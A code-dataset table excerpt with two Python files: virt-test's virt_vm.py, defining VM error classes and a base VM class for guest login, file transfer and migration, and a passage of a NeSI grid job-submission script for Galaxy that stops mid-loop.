| repo_name (string, 5–100 chars) | ref (string, 12–67 chars) | path (string, 4–244 chars) | copies (string, 1–8 chars) | content (string, 0–1.05M chars, nullable) |
|---|---|---|---|---|
imammedo/virt-test | refs/heads/master | virttest/virt_vm.py | 2 |
import logging, time, glob, re
from autotest.client.shared import error
import utils_misc, utils_net, remote
class VMError(Exception):
pass
class VMCreateError(VMError):
def __init__(self, cmd, status, output):
VMError.__init__(self, cmd, status, output)
self.cmd = cmd
self.status = status
self.output = output
def __str__(self):
return ("VM creation command failed: %r (status: %s, "
"output: %r)" % (self.cmd, self.status, self.output))
class VMStartError(VMError):
def __init__(self, name, reason=None):
VMError.__init__(self, name, reason)
self.name = name
self.reason = reason
def __str__(self):
msg = "VM '%s' failed to start" % self.name
if self.reason is not None:
msg += ": %s" % self.reason
return msg
class VMConfigMissingError(VMError):
def __init__(self, name, config):
VMError.__init__(self, name, config)
self.name = name
self.config = config
def __str__(self):
return "Missing config '%s' for VM %s" % (self.config, self.name)
class VMHashMismatchError(VMError):
def __init__(self, actual, expected):
VMError.__init__(self, actual, expected)
self.actual_hash = actual
self.expected_hash = expected
def __str__(self):
return ("CD image hash (%s) differs from expected one (%s)" %
(self.actual_hash, self.expected_hash))
class VMImageMissingError(VMError):
def __init__(self, filename):
VMError.__init__(self, filename)
self.filename = filename
def __str__(self):
return "CD image file not found: %r" % self.filename
class VMImageCheckError(VMError):
def __init__(self, filename):
VMError.__init__(self, filename)
self.filename = filename
def __str__(self):
return "Errors found on image: %r" % self.filename
class VMBadPATypeError(VMError):
def __init__(self, pa_type):
VMError.__init__(self, pa_type)
self.pa_type = pa_type
def __str__(self):
return "Unsupported PCI assignable type: %r" % self.pa_type
class VMPAError(VMError):
def __init__(self, pa_type):
VMError.__init__(self, pa_type)
self.pa_type = pa_type
def __str__(self):
return ("No PCI assignable devices could be assigned "
"(pci_assignable=%r)" % self.pa_type)
class VMPostCreateError(VMError):
def __init__(self, cmd, output):
VMError.__init__(self, cmd, output)
self.cmd = cmd
self.output = output
class VMHugePageError(VMPostCreateError):
def __str__(self):
return ("Cannot allocate hugepage memory (command: %r, "
"output: %r)" % (self.cmd, self.output))
class VMKVMInitError(VMPostCreateError):
def __str__(self):
return ("Cannot initialize KVM (command: %r, output: %r)" %
(self.cmd, self.output))
class VMDeadError(VMError):
def __init__(self, reason='', detail=''):
VMError.__init__(self)
self.reason = reason
self.detail = detail
def __str__(self):
msg = "VM is dead"
if self.reason:
msg += " reason: %s" % self.reason
if self.detail:
msg += " detail: %r" % self.detail
return (msg)
class VMDeadKernelCrashError(VMError):
def __init__(self, kernel_crash):
VMError.__init__(self, kernel_crash)
self.kernel_crash = kernel_crash
def __str__(self):
return ("VM is dead due to a kernel crash:\n%s" % self.kernel_crash)
class VMInvalidInstructionCode(VMError):
def __init__(self, invalid_code):
VMError.__init__(self, invalid_code)
self.invalid_code = invalid_code
def __str__(self):
error = ""
for invalid_code in self.invalid_code:
error += "%s" % (invalid_code)
return ("Invalid instruction was executed on VM:\n%s" % error)
class VMAddressError(VMError):
pass
class VMPortNotRedirectedError(VMAddressError):
def __init__(self, port):
VMAddressError.__init__(self, port)
self.port = port
def __str__(self):
return "Port not redirected: %s" % self.port
class VMAddressVerificationError(VMAddressError):
def __init__(self, mac, ip):
VMAddressError.__init__(self, mac, ip)
self.mac = mac
self.ip = ip
def __str__(self):
return ("Could not verify DHCP lease: "
"%s --> %s" % (self.mac, self.ip))
class VMMACAddressMissingError(VMAddressError):
def __init__(self, nic_index):
VMAddressError.__init__(self, nic_index)
self.nic_index = nic_index
def __str__(self):
return "No MAC defined for NIC #%s" % self.nic_index
class VMIPAddressMissingError(VMAddressError):
def __init__(self, mac):
VMAddressError.__init__(self, mac)
self.mac = mac
def __str__(self):
return "No DHCP lease for MAC %s" % self.mac
class VMUnknownNetTypeError(VMError):
def __init__(self, vmname, nicname, nettype):
super(VMUnknownNetTypeError, self).__init__()
self.vmname = vmname
self.nicname = nicname
self.nettype = nettype
def __str__(self):
return "Unknown nettype '%s' requested for NIC %s on VM %s" % (
self.nettype, self.nicname, self.vmname)
class VMAddNetDevError(VMError):
pass
class VMDelNetDevError(VMError):
pass
class VMAddNicError(VMError):
pass
class VMDelNicError(VMError):
pass
class VMMigrateError(VMError):
pass
class VMMigrateTimeoutError(VMMigrateError):
pass
class VMMigrateCancelError(VMMigrateError):
pass
class VMMigrateFailedError(VMMigrateError):
pass
class VMMigrateProtoUnsupportedError(VMMigrateError):
pass
class VMMigrateStateMismatchError(VMMigrateError):
def __init__(self):
VMMigrateError.__init__(self)
def __str__(self):
return ("Mismatch of VM state before and after migration")
class VMRebootError(VMError):
pass
class VMStatusError(VMError):
pass
class VMRemoveError(VMError):
pass
class VMDeviceError(VMError):
pass
class VMDeviceNotSupportedError(VMDeviceError):
def __init__(self, name, device):
VMDeviceError.__init__(self, name, device)
self.name = name
self.device = device
def __str__(self):
return ("Device '%s' is not supported for vm '%s' on this Host." %
(self.device, self.name))
class VMPCIDeviceError(VMDeviceError):
pass
class VMPCISlotInUseError(VMPCIDeviceError):
def __init__(self, name, slot):
VMPCIDeviceError.__init__(self, name, slot)
self.name = name
self.slot = slot
def __str__(self):
return ("PCI slot '0x%s' is already in use on vm '%s'. Please assign"
" another slot in config file." % (self.slot, self.name))
class VMPCIOutOfRangeError(VMPCIDeviceError):
def __init__(self, name, max_dev_num):
VMPCIDeviceError.__init__(self, name, max_dev_num)
self.name = name
self.max_dev_num = max_dev_num
def __str__(self):
return ("Too many PCI devices added on vm '%s', max supported '%s'" %
(self.name, str(self.max_dev_num)))
class VMUSBError(VMError):
pass
class VMUSBControllerError(VMUSBError):
pass
class VMUSBControllerMissingError(VMUSBControllerError):
def __init__(self, name, controller_type):
VMUSBControllerError.__init__(self, name, controller_type)
self.name = name
self.controller_type = controller_type
def __str__(self):
return ("Could not find '%s' USB Controller on vm '%s'. Please "
"check config files." % (self.controller_type, self.name))
class VMUSBControllerPortFullError(VMUSBControllerError):
def __init__(self, name):
VMUSBControllerError.__init__(self, name)
self.name = name
def __str__(self):
return ("No available USB Controller port left for VM %s." % self.name)
class VMScreenInactiveError(VMError):
def __init__(self, vm, inactive_time):
VMError.__init__(self)
self.vm = vm
self.inactive_time = inactive_time
def __str__(self):
msg = ("%s screen is inactive for %d s (%d min)" %
(self.vm.name, self.inactive_time, self.inactive_time/60))
return msg
class CpuInfo(object):
"""
A class for VM's cpu information.
"""
def __init__(self, model=None, vendor=None, flags=None, family=None,
smp=0, maxcpus=0, sockets=0, cores=0, threads=0):
"""
@param model: CPU Model of VM (use 'qemu -cpu ?' for list)
@param vendor: CPU Vendor of VM
@param flags: CPU Flags of VM
@param family: CPU Family of VM
@param smp: set the number of CPUs to 'n' [default=1]
@param maxcpus: maximum number of total cpus, including
offline CPUs for hotplug, etc
@param cores: number of CPU cores on one socket
@param threads: number of threads on one CPU core
@param sockets: number of discrete sockets in the system
"""
self.model = model
self.vendor = vendor
self.flags = flags
self.family = family
self.smp = smp
self.maxcpus = maxcpus
self.sockets = sockets
self.cores = cores
self.threads = threads
class BaseVM(object):
"""
Base class for all hypervisor specific VM subclasses.
This class should not be used directly, that is, do not attempt to
instantiate and use this class. Instead, one should implement a subclass
that implements, at the very least, all methods defined right after the
the comment blocks that are marked with:
"Public API - *must* be reimplemented with virt specific code"
and
"Protected API - *must* be reimplemented with virt specific classes"
The current proposal regarding methods naming convention is:
- Public API methods: named in the usual way, consumed by tests
- Protected API methods: name begins with a single underline, to be
consumed only by BaseVM and subclasses
- Private API methods: name begins with double underline, to be consumed
only by the VM subclass itself (usually implements virt specific
functionality: example: __make_qemu_command())
So called "protected" methods are intended to be used only by VM classes,
and not be consumed by tests. These should respect a naming convention
and always be preceded by a single underline.
Currently most (if not all) methods are public and appear to be consumed
by tests. It is an ongoing task to determine whether methods should be
"public" or "protected".
"""
#
# Assuming that all low-level hypervisors have at least migration via tcp
# (true for xen & kvm). Also true for libvirt (using xen and kvm drivers)
#
MIGRATION_PROTOS = ['tcp', ]
#
# Timeout definition. This is being kept inside the base class so that
# sub classes can change the default just for themselves
#
LOGIN_TIMEOUT = 10
LOGIN_WAIT_TIMEOUT = 240
COPY_FILES_TIMEOUT = 600
MIGRATE_TIMEOUT = 3600
REBOOT_TIMEOUT = 240
CREATE_TIMEOUT = 5
def __init__(self, name, params):
self.name = name
self.params = params
#
# Assuming all low-level hypervisors will have a serial (like) console
# connection to the guest. libvirt also supports serial (like) consoles
# (virDomainOpenConsole). subclasses should set this to an object that
# is or behaves like aexpect.ShellSession.
#
self.serial_console = None
self.remote_sessions = []
# Create instance if not already set
if not hasattr(self, 'instance'):
self._generate_unique_id()
# Don't overwrite existing state, update from params
if hasattr(self, 'virtnet'):
# Direct reference to self.virtnet makes pylint complain
# note: virtnet.__init__() supports being called anytime
getattr(self, 'virtnet').__init__(self.params,
self.name,
self.instance)
else: # Create new
self.virtnet = utils_net.VirtNet(self.params,
self.name,
self.instance)
if not hasattr(self, 'cpuinfo'):
self.cpuinfo = CpuInfo()
def _generate_unique_id(self):
"""
Generate a unique identifier for this VM
"""
while True:
self.instance = (time.strftime("%Y%m%d-%H%M%S-") +
utils_misc.generate_random_string(8))
if not glob.glob("/tmp/*%s" % self.instance):
break
#
# Public API - could be reimplemented with virt specific code
#
def needs_restart(self, name, params, basedir):
"""
Verifies whether the current virt_install commandline matches the
requested one, based on the test parameters.
"""
try:
need_restart = (self.make_create_command() !=
self.make_create_command(name, params, basedir))
except Exception:
need_restart = True
if need_restart:
logging.debug("VM params in env don't match requested, restarting.")
return True
else:
# Command-line encoded state doesn't include all params
# TODO: Check more than just networking
other_virtnet = utils_net.VirtNet(params, name, self.instance)
if self.virtnet != other_virtnet:
logging.debug("VM params in env match, but network differs, "
"restarting")
logging.debug("\t" + str(self.virtnet))
logging.debug("\t!=")
logging.debug("\t" + str(other_virtnet))
return True
else:
logging.debug("VM params in env do match requested, continuing.")
return False
def verify_alive(self):
"""
Make sure the VM is alive and that the main monitor is responsive.
Can be subclassed to provide better information on why the VM is
not alive (reason, detail)
@raise VMDeadError: If the VM is dead
@raise: Various monitor exceptions if the monitor is unresponsive
"""
if self.is_dead():
raise VMDeadError
def get_mac_address(self, nic_index=0):
"""
Return the MAC address of a NIC.
@param nic_index: Index of the NIC
@raise VMMACAddressMissingError: If no MAC address is defined for the
requested NIC
"""
try:
mac = self.virtnet[nic_index].mac
return mac
except KeyError:
raise VMMACAddressMissingError(nic_index)
def get_address(self, index=0):
"""
Return the IP address of a NIC or guest (in host space).
@param index: Name or index of the NIC whose address is requested.
@return: 'localhost': Port redirection is in use
@return: IP address of NIC if valid in arp cache.
@raise VMMACAddressMissingError: If no MAC address is defined for the
requested NIC
@raise VMIPAddressMissingError: If no IP address is found for the
NIC's MAC address
@raise VMAddressVerificationError: If the MAC-IP address mapping cannot
be verified (using arping)
"""
nic = self.virtnet[index]
# TODO: Determine port redirection in use w/o checking nettype
if nic.nettype != 'bridge':
return "localhost"
if not nic.has_key('mac') and self.params.get('vm_type') == 'libvirt':
# Look it up from xml
nic.mac = self.get_virsh_mac_address(index)
# else TODO: Look up mac from existing qemu-kvm process
if not nic.has_key('mac'):
raise VMMACAddressMissingError(index)
else:
# Get the IP address from arp cache, try upper and lower case
arp_ip = self.address_cache.get(nic.mac.upper())
if not arp_ip:
arp_ip = self.address_cache.get(nic.mac.lower())
if not arp_ip:
raise VMIPAddressMissingError(nic.mac)
# Make sure the IP address is assigned to one or more macs
# for this guest
macs = self.virtnet.mac_list()
if not utils_net.verify_ip_address_ownership(arp_ip, macs):
raise VMAddressVerificationError(nic.mac, arp_ip)
logging.debug('Found/Verified IP %s for VM %s NIC %s' % (
arp_ip, self.name, str(index)))
return arp_ip
def fill_addrs(self, addrs):
"""
Fill the VM's NIC addresses into the virtnet structure, based on the VM's
address structure addrs.
@param addrs: Dict of interfaces and address
{"if_name":{"mac":['addrs',],
"ipv4":['addrs',],
"ipv6":['addrs',]},
...}
"""
for virtnet in self.virtnet:
for iface_name, iface in addrs.iteritems():
if virtnet.mac in iface["mac"]:
virtnet.ip = {"ipv4": iface["ipv4"],
"ipv6": iface["ipv6"]}
virtnet.g_nic_name = iface_name
def get_port(self, port, nic_index=0):
"""
Return the port in host space corresponding to port in guest space.
@param port: Port number in guest space.
@param nic_index: Index of the NIC.
@return: If port redirection is used, return the host port redirected
to the guest port. Otherwise return port unchanged.
@raise VMPortNotRedirectedError: If an unredirected port is requested
in user mode
"""
if self.virtnet[nic_index].nettype == "bridge":
return port
else:
try:
return self.redirs[port]
except KeyError:
raise VMPortNotRedirectedError(port)
def free_mac_address(self, nic_index_or_name=0):
"""
Free a NIC's MAC address.
@param nic_index_or_name: Index or name of the NIC
"""
self.virtnet.free_mac_address(nic_index_or_name)
@error.context_aware
def wait_for_get_address(self, nic_index_or_name, timeout=30, internal_timeout=1):
"""
Wait for a nic to acquire an IP address, then return it.
"""
# Don't let VMIPAddressMissingError/VMAddressVerificationError through
def _get_address():
try:
return self.get_address(nic_index_or_name)
except (VMIPAddressMissingError, VMAddressVerificationError):
return False
if not utils_misc.wait_for(_get_address, timeout, internal_timeout):
raise VMIPAddressMissingError(self.virtnet[nic_index_or_name].mac)
return self.get_address(nic_index_or_name)
# Adding/setup networking devices methods split between 'add_*' for
# setting up virtnet, and 'activate_' for performing actions based
# on settings.
def add_nic(self, **params):
"""
Add a new NIC or set up an existing one, with optional model type and MAC address
@param: **params: Additional NIC parameters to set.
@param: nic_name: Name for device
@param: mac: Optional MAC address, None to randomly generate.
@param: ip: Optional IP address to register in address_cache
@return: Dict with new NIC's info.
"""
if not params.has_key('nic_name'):
params['nic_name'] = utils_misc.generate_random_id()
nic_name = params['nic_name']
if nic_name in self.virtnet.nic_name_list():
self.virtnet[nic_name].update(**params)
else:
self.virtnet.append(params)
nic = self.virtnet[nic_name]
if not nic.has_key('mac'): # generate random mac
logging.debug("Generating random mac address for nic")
self.virtnet.generate_mac_address(nic_name)
# mac of '' or invalid format results in not setting a mac
if nic.has_key('ip') and nic.has_key('mac'):
if not self.address_cache.has_key(nic.mac):
logging.debug("(address cache) Adding static "
"cache entry: %s ---> %s" % (nic.mac, nic.ip))
else:
logging.debug("(address cache) Updating static "
"cache entry from: %s ---> %s"
" to: %s ---> %s" % (nic.mac,
self.address_cache[nic.mac], nic.mac, nic.ip))
self.address_cache[nic.mac] = nic.ip
return nic
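# A minimal usage sketch for add_nic() (not part of the original file;
# 'vm' and the NIC names are hypothetical). Omitting 'mac' triggers random
# MAC generation, while passing 'ip' pre-seeds the address cache:
#
#     nic = vm.add_nic(nic_name='nic1', nic_model='virtio')
#     assert 'mac' in nic  # generated automatically above
#     vm.add_nic(nic_name='nic2', mac='52:54:00:12:34:56',
#                ip='192.168.122.10')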
def del_nic(self, nic_index_or_name):
"""
Remove the NIC specified by name or index number
"""
nic = self.virtnet[nic_index_or_name]
nic_mac = nic.mac.lower()
self.free_mac_address(nic_index_or_name)
try:
del self.virtnet[nic_index_or_name]
del self.address_cache[nic_mac]
except IndexError:
pass # continue to not exist
except KeyError:
pass # continue to not exist
def verify_kernel_crash(self):
"""
Find kernel crash message on the VM serial console.
@raise: VMDeadKernelCrashError, in case a kernel crash message was
found.
"""
if self.serial_console is not None:
data = self.serial_console.get_output()
match = re.search(r"BUG:.*---\[ end trace .* \]---", data,
re.DOTALL|re.MULTILINE)
if match is not None:
raise VMDeadKernelCrashError(match.group(0))
def verify_illegal_instruction(self):
"""
Find illegal instruction code on VM serial console output.
@raise: VMInvalidInstructionCode, in case an invalid instruction code was
found.
"""
if self.serial_console is not None:
data = self.serial_console.get_output()
match = re.findall(r".*trap invalid opcode.*\n", data,
re.MULTILINE)
if match:
raise VMInvalidInstructionCode(match)
def get_params(self):
"""
Return the VM's params dict. Most modified params take effect only
upon VM.create().
"""
return self.params
def get_serial_console_filename(self, name=None):
"""
Return the serial console filename.
@param name: The serial port name.
"""
if name:
return "/tmp/serial-%s-%s" % (name, self.instance)
return "/tmp/serial-%s" % self.instance
def get_serial_console_filenames(self):
"""
Return a list of all serial console filenames
(as specified in the VM's params).
"""
return [self.get_serial_console_filename(_) for _ in
self.params.objects("isa_serials")]
def get_testlog_filename(self):
"""
Return the testlog filename.
"""
return "/tmp/testlog-%s" % self.instance
def get_virtio_port_filename(self, port_name):
"""
Return the filename corresponding to a given virtio port name.
"""
return "/tmp/virtio_port-%s-%s" % (port_name, self.instance)
def get_virtio_port_filenames(self):
"""
Return a list of all virtio port filenames (as specified in the VM's
params).
"""
return [self.get_virtio_port_filename(v) for v in
self.params.objects("virtio_ports")]
@error.context_aware
def login(self, nic_index=0, timeout=LOGIN_TIMEOUT):
"""
Log into the guest via SSH/Telnet/Netcat.
If timeout expires while waiting for output from the guest (e.g. a
password prompt or a shell prompt) -- fail.
@param nic_index: The index of the NIC to connect to.
@param timeout: Time (seconds) before giving up logging into the
guest.
@return: A ShellSession object.
"""
error.context("logging into '%s'" % self.name)
username = self.params.get("username", "")
password = self.params.get("password", "")
prompt = self.params.get("shell_prompt", "[\#\$]")
linesep = eval("'%s'" % self.params.get("shell_linesep", r"\n"))
client = self.params.get("shell_client")
address = self.get_address(nic_index)
port = self.get_port(int(self.params.get("shell_port")))
log_filename = ("session-%s-%s.log" %
(self.name, utils_misc.generate_random_string(4)))
session = remote.remote_login(client, address, port, username,
password, prompt, linesep,
log_filename, timeout)
session.set_status_test_command(self.params.get("status_test_command",
""))
self.remote_sessions.append(session)
return session
def remote_login(self, nic_index=0, timeout=LOGIN_TIMEOUT):
"""
Alias for login() for backward compatibility.
"""
return self.login(nic_index, timeout)
def wait_for_login(self, nic_index=0, timeout=LOGIN_WAIT_TIMEOUT,
internal_timeout=LOGIN_TIMEOUT):
"""
Make multiple attempts to log into the guest via SSH/Telnet/Netcat.
@param nic_index: The index of the NIC to connect to.
@param timeout: Time (seconds) to keep trying to log in.
@param internal_timeout: Timeout to pass to login().
@return: A ShellSession object.
"""
error_messages = []
logging.debug("Attempting to log into '%s' (timeout %ds)", self.name,
timeout)
end_time = time.time() + timeout
while time.time() < end_time:
try:
return self.login(nic_index, internal_timeout)
except (remote.LoginError, VMError), e:
self.verify_alive()
e = str(e)
if e not in error_messages:
logging.debug(e)
error_messages.append(e)
time.sleep(2)
# Timeout expired; try one more time but don't catch exceptions
return self.login(nic_index, internal_timeout)
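# A hedged usage sketch: wait_for_login() retries login() every 2 seconds
# until 'timeout' expires, then makes one final uncaught attempt, so callers
# normally need no retry loop of their own ('vm' is hypothetical):
#
#     session = vm.wait_for_login(nic_index=0, timeout=300)
#     try:
#         session.cmd('uname -a')
#     finally:
#         session.close()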
@error.context_aware
def copy_files_to(self, host_path, guest_path, nic_index=0, limit="",
verbose=False, timeout=COPY_FILES_TIMEOUT):
"""
Transfer files to the remote host (guest).
@param host_path: Host path
@param guest_path: Guest path
@param nic_index: The index of the NIC to connect to.
@param limit: Speed limit of file transfer.
@param verbose: If True, log some stats using logging.debug (RSS only)
@param timeout: Time (seconds) before giving up on doing the remote
copy.
"""
error.context("sending file(s) to '%s'" % self.name)
username = self.params.get("username", "")
password = self.params.get("password", "")
client = self.params.get("file_transfer_client")
address = self.get_address(nic_index)
port = self.get_port(int(self.params.get("file_transfer_port")))
log_filename = ("transfer-%s-to-%s-%s.log" %
(self.name, address,
utils_misc.generate_random_string(4)))
remote.copy_files_to(address, client, username, password, port,
host_path, guest_path, limit, log_filename,
verbose, timeout)
@error.context_aware
def copy_files_from(self, guest_path, host_path, nic_index=0, limit="",
verbose=False, timeout=COPY_FILES_TIMEOUT):
"""
Transfer files from the guest.
@param guest_path: Guest path
@param host_path: Host path
@param nic_index: The index of the NIC to connect to.
@param limit: Speed limit of file transfer.
@param verbose: If True, log some stats using logging.debug (RSS only)
@param timeout: Time (seconds) before giving up on doing the remote
copy.
"""
error.context("receiving file(s) from '%s'" % self.name)
username = self.params.get("username", "")
password = self.params.get("password", "")
client = self.params.get("file_transfer_client")
address = self.get_address(nic_index)
port = self.get_port(int(self.params.get("file_transfer_port")))
log_filename = ("transfer-%s-from-%s-%s.log" %
(self.name, address,
utils_misc.generate_random_string(4)))
remote.copy_files_from(address, client, username, password, port,
guest_path, host_path, limit, log_filename,
verbose, timeout)
@error.context_aware
def serial_login(self, timeout=LOGIN_TIMEOUT):
"""
Log into the guest via the serial console.
If timeout expires while waiting for output from the guest (e.g. a
password prompt or a shell prompt) -- fail.
@param timeout: Time (seconds) before giving up logging into the guest.
@return: ShellSession object on success and None on failure.
"""
error.context("logging into '%s' via serial console" % self.name)
username = self.params.get("username", "")
password = self.params.get("password", "")
prompt = self.params.get("shell_prompt", "[\#\$]")
linesep = eval("'%s'" % self.params.get("shell_linesep", r"\n"))
status_test_command = self.params.get("status_test_command", "")
self.serial_console.set_linesep(linesep)
self.serial_console.set_status_test_command(status_test_command)
# Try to get a login prompt
self.serial_console.sendline()
remote._remote_login(self.serial_console, username, password,
prompt, timeout)
return self.serial_console
def wait_for_serial_login(self, timeout=LOGIN_WAIT_TIMEOUT,
internal_timeout=LOGIN_TIMEOUT):
"""
Make multiple attempts to log into the guest via serial console.
@param timeout: Time (seconds) to keep trying to log in.
@param internal_timeout: Timeout to pass to serial_login().
@return: A ShellSession object.
"""
error_messages = []
logging.debug("Attempting to log into '%s' via serial console "
"(timeout %ds)", self.name, timeout)
end_time = time.time() + timeout
while time.time() < end_time:
try:
return self.serial_login(internal_timeout)
except remote.LoginError, e:
self.verify_alive()
e = str(e)
if e not in error_messages:
logging.debug(e)
error_messages.append(e)
time.sleep(2)
# Timeout expired; try one more time but don't catch exceptions
return self.serial_login(internal_timeout)
def get_uuid(self):
"""
Return the UUID of the VM.
@return: None, if not specified in the config file
"""
if self.params.get("uuid") == "random":
return self.uuid
else:
return self.params.get("uuid", None)
def send_string(self, sr):
"""
Send a string to the VM.
@param sr: String, which must consist of alphanumeric characters only.
Capital letters are allowed.
"""
for char in sr:
if char.isupper():
self.send_key("shift-%s" % char.lower())
else:
self.send_key(char)
def get_cpu_count(self):
"""
Get the cpu count of the VM.
"""
session = self.login()
try:
return int(session.cmd(self.params.get("cpu_chk_cmd")))
finally:
session.close()
def get_memory_size(self, cmd=None):
"""
Get bootup memory size of the VM.
@param cmd: Command used to check memory. If not provided,
self.params.get("mem_chk_cmd") will be used.
"""
session = self.login()
try:
if not cmd:
cmd = self.params.get("mem_chk_cmd")
mem_str = session.cmd(cmd)
mem = re.findall("([0-9]+)", mem_str)
mem_size = 0
for m in mem:
mem_size += int(m)
if "GB" in mem_str:
mem_size *= 1024
elif "MB" in mem_str:
pass
else:
mem_size /= 1024
return int(mem_size)
finally:
session.close()
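# Worked example of the normalization above (assuming a Linux-style
# mem_chk_cmd such as 'grep MemTotal /proc/meminfo'): the output
# "MemTotal: 2048000 kB" contains no "GB"/"MB" marker, so the summed
# value 2048000 is divided by 1024, returning 2000 (MB).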
def get_current_memory_size(self):
"""
Get current memory size of the VM, rather than bootup memory.
"""
cmd = self.params.get("mem_chk_cur_cmd")
return self.get_memory_size(cmd)
#
# Public API - *must* be reimplemented with virt specific code
#
def is_alive(self):
"""
Return True if the VM is alive and the management interface is responsive.
"""
raise NotImplementedError
def is_dead(self):
"""
Return True if the VM is dead.
"""
raise NotImplementedError
def activate_nic(self, nic_index_or_name):
"""
Activate an inactive network device
@param: nic_index_or_name: name or index number for existing NIC
"""
raise NotImplementedError
def deactivate_nic(self, nic_index_or_name):
"""
Deactivate an active network device
@param: nic_index_or_name: name or index number for existing NIC
"""
raise NotImplementedError
def verify_userspace_crash(self):
"""
Verify if the userspace component of the virtualization backend crashed.
"""
pass
def clone(self, name, **params):
"""
Return a clone of the VM object with optionally modified parameters.
This method should be implemented by hypervisor-specific subclasses.
"""
raise NotImplementedError
def destroy(self, gracefully=True, free_mac_addresses=True):
"""
Destroy the VM.
If gracefully is True, first attempt to shutdown the VM with a shell
command. Then, attempt to destroy the VM via the monitor with a 'quit'
command. If that fails, send SIGKILL to the qemu process.
@param gracefully: If True, an attempt will be made to end the VM
using a shell command before trying to end the qemu process
with a 'quit' or a kill signal.
@param free_mac_addresses: If True, the MAC addresses used by the VM
will be freed.
"""
raise NotImplementedError
def migrate(self, timeout=MIGRATE_TIMEOUT, protocol="tcp",
cancel_delay=None, offline=False, stable_check=False,
clean=True, save_path="/tmp", dest_host="localhost",
remote_port=None):
"""
Migrate the VM.
If the migration is local, the VM object's state is switched with that
of the destination VM. Otherwise, the state is switched with that of
a dead VM (returned by self.clone()).
@param timeout: Time to wait for migration to complete.
@param protocol: Migration protocol ('tcp', 'unix' or 'exec').
@param cancel_delay: If provided, specifies a time duration after which
migration will be canceled. Used for testing migrate_cancel.
@param offline: If True, pause the source VM before migration.
@param stable_check: If True, compare the VM's state after migration to
its state before migration and raise an exception if they
differ.
@param clean: If True, delete the saved state files (relevant only if
stable_check is also True).
@param save_path: The path for state files.
@param dest_host: Destination host (defaults to 'localhost').
@param remote_port: Port to use for remote migration.
"""
raise NotImplementedError
def reboot(self, session=None, method="shell", nic_index=0,
timeout=REBOOT_TIMEOUT):
"""
Reboot the VM and wait for it to come back up by trying to log in until
timeout expires.
@param session: A shell session object or None.
@param method: Reboot method. Can be "shell" (send a shell reboot
command) or "system_reset" (send a system_reset monitor command).
@param nic_index: Index of NIC to access in the VM, when logging in
after rebooting.
@param timeout: Time to wait for login to succeed (after rebooting).
@return: A new shell session object.
"""
raise NotImplementedError
# should this really be expected from VMs of all hypervisor types?
def send_key(self, keystr):
"""
Send a key event to the VM.
@param: keystr: A key event string (e.g. "ctrl-alt-delete")
"""
raise NotImplementedError
def save_to_file(self, path):
"""
Record the state of a paused VM to path and shut the VM down on success.
Throws a VMStatusError if the before/after state is incorrect.
@param path: file where the VM state is recorded
"""
raise NotImplementedError
def restore_from_file(self, path):
"""
Resume a shut-down or paused VM from path, possibly setting it running.
Throws a VMStatusError if the before/after restore state is incorrect.
@param path: path to the file the VM state was saved to
"""
raise NotImplementedError
def pause(self):
"""
Stop the VM operation.
"""
raise NotImplementedError
def resume(self):
"""
Resume the VM operation in case it's stopped.
"""
raise NotImplementedError
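# A minimal sketch (not part of virt-test) of what a hypervisor-specific
# subclass must provide, per the "Public API - *must* be reimplemented"
# contract above. All names besides the overridden methods are assumptions:
#
#     class FakeVM(BaseVM):
#         def __init__(self, name, params, process=None):
#             super(FakeVM, self).__init__(name, params)
#             self.process = process  # hypothetical handle to the VM process
#         def is_alive(self):
#             return self.process is not None and self.process.poll() is None
#         def is_dead(self):
#             return not self.is_alive()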
|
theboocock/NesiGridSelection | refs/heads/master | nesi/nesi_scripts/submit_job.py | 2 |
#!~/NeSI_Tools/bin/grython
# FIXME: need an installer type thing to do ^^ correctly
#
# Author: Ed hills
# Date: 17/12/12
# Descr: This grython script submits a job to the NeSI grid. It handles
#        single jobs only, not batch jobs. Still an early design; not yet
#        complete.
# Arguments:
# argv1 = queue
# argv2 = group
# argv3 = galaxy job id
# argv4 = file to write jobname to
# argv5 = command line
# argv6-n = files to be staged in
# TODO: !! Add tool specific walltime !!
# TODO: !! Add tool specific memory usage !!
# TODO: add possibility for emailing user if defined in galaxy config
# TODO: get application and check that it is ok to run on queue
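# Example invocation (hypothetical paths, for illustration only; the argv
# layout follows the argument list above):
#   grython submit_job.py pan:pan.nesi.org.nz /nz/nesi 42 /tmp/jobname.txt \
#       "bash tool.sh input.dat" /tmp/job.sh /tmp/working input.dat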
from grisu.Grython import serviceInterface as si
from grisu.frontend.control.login import LoginManager
from grisu.frontend.model.job import JobObject, BatchJobObject, JobsException
from grisu.model import FileManager
from grisu.jcommons.constants import Constants
import time
import sys
import os
DEFAULT_GROUP = '/nz/nesi'
DEFAULT_QUEUE = 'pan:pan.nesi.org.nz'
DEFAULT_MEMORY = 21474836480  # 20 GB
DEFAULT_WALLTIME = 6000  # 100 minutes
current_dir = os.path.abspath(os.path.curdir)
# TODO not use argv like this. use command line args instead
queue = sys.argv[1]
group = sys.argv[2]
galaxy_job_id = sys.argv[3]
jobname_file = sys.argv[4]
command = sys.argv[5]
job_script = sys.argv[6]
working_directory = sys.argv[7]
input_files = list()
job_header="""#!/bin/sh
%s
"""
if group == '':
group = DEFAULT_GROUP
if queue == '':
queue = DEFAULT_QUEUE
for f in sys.argv[8:]:
input_files.append(f)
try:
job = JobObject(si)
job.setSubmissionLocation(queue)
job.setTimestampJobname("galaxy_" + galaxy_job_id)
job.setMemory(DEFAULT_MEMORY)
job.setWalltimeInSeconds(DEFAULT_WALLTIME)
# stop annoying stats from being written to stderr
job.addEnvironmentVariable("SUPPRESS_STATS", "true")
#create the job script#
except:
print "Cannot setup the job environment"
sys.exit(-4)
#create nesi job_script
try:
# save jobname for job
njn = open(jobname_file, "w")
njn.write(job.getJobname())
njn.close()
except:
print "Cannot write jobname to file"
sys.exit(-2)
command_arguments = command.split()
print input_files
new_commandline = ""
file = open("/home/jamesboocock/blah.txt", 'a')
for arg in command_arguments:
file.write(arg + '\n')
arg=arg.replace('"','')
print("arg: " + arg)
if ((os.path.exists(arg)) or (os.path.isfile(arg)==True)) and (arg not in input_files) and ("_file" not in arg):
try:
job.addInputFileUrl(arg)
print "Stagin in: " + arg
file.write("stagin in 1" + arg + '\n')
except Exception, e:
print "Cannot stage in: " + arg
print e
job.kill(True)
sys.exit(-3)
elif ((os.path.exists(arg)) or (os.path.isfile(arg)==True)) and (arg not in input_files) and ("_file" in arg):
try:
folder=arg.split('/')[len(arg.split('/'))-2]
fil= arg.split('/')[len(arg.split('/'))-1]
argupdate=os.path.join(working_directory,os.path.join((folder.split('.')[0]), fil))
print "argupdate " + argupdate
if(os.path.isfile(argupdate)):
print "Stagin in: " + argupdate
